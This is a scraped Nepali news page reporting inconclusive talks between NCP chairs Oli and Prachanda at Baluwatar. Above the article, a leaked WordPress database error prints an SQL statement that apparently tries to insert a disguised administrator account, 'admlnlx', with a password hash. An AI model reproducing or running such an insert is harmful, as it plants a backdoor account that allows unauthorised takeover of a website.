WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BGuOQM60AxyEzbPJWc4HSQS2jPb38v/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 03:41:56', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाडौँ । नेपाल कम्युनिष्ट पार्टी (नेकपा) का अध्यक्षद्वय केपी शर्मा ओली र पुष्पकमल दाहाल प्रचण्डबीच बालुवाटारमा भइरहेको वार्ता सकिएको छ । बिहान साढे ११ बजेबाट शुरु भएको वार्ता सवा २ बजे सकिएको प्रधानमन्त्रीका सञ्चार विज्ञ रामशरण बजगाईंले जानकारी गराए ।
अध्यक्षद्वयसँग महासचिव विष्णु पौडेल र स्थायी कमिटी सदस्य जनार्दन शर्मा प्रभाकरको पनि उपस्थिति रहेको उहाँले बताए । पार्टीभित्र असमझदारी बढेपछि त्यसलाई सल्टाउन दुई अध्यक्षबीच निर्णायक वार्ता भएको बुझिएको छ । छलफलले कुनै ठोस निष्कर्ष ननिकाले पनि भोलि फेरि अर्को छलफल गर्ने सहमति भएको स्रोतले बतायो ।
दलका नेताहरूले दुई अध्यक्षबीच सहमति हुनुपर्ने र पार्टी फुट्नबाट जोगाउनुपर्ने दबाव दिइरहेका बेला दुई अध्यक्षबीच वार्ता भएको हो । शनिबार बिहान ११ बजे पार्टीको स्थायी कमिटीको बैठक आव्हान गरिएको छ । सोअघि सहमतिमा पुग्नैपर्ने दबाव अध्यक्षहरूलाई छ ।